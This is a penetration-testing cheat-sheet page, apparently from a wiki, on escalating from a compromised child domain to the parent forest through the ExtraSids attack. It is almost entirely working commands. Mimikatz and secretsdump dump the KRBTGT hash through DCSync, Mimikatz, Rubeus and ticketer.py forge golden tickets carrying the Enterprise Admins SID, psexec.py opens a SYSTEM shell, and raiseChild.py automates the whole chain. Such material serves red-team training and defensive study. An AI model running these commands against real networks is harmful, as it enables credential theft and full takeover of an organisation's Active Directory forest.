Child -> Parent Trusts

Windows

ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SID
PS C:\>  mimikatz # lsadump::dcsync /user:LOGISTICS\\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using cmdlet  
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL".

# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking if Golden ticket for non existant user hacker is residing in memory
klist

ExtraSids Attack - Rubeus

# Creating a Golden Ticket using Rubeus
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Linux

# Performing DCSync with secretsdump.py
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Performing SID Brute Forcing using lookupsid.py
# to create their SID : DOMAIN_SID-RID
lookupsid.py child.domain.local/adm@ip

# Looking for the Domain SID
lookupsid.py child.domain.local/adm@ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell using Impacket's psexec.py
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

OOORRR 
# Automating all of above 
# Performing the Attack with raiseChild.py
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm

PreviousEnumerating Trust Relationships NextCross-Forest Trust Abuse

Last updated 3 years ago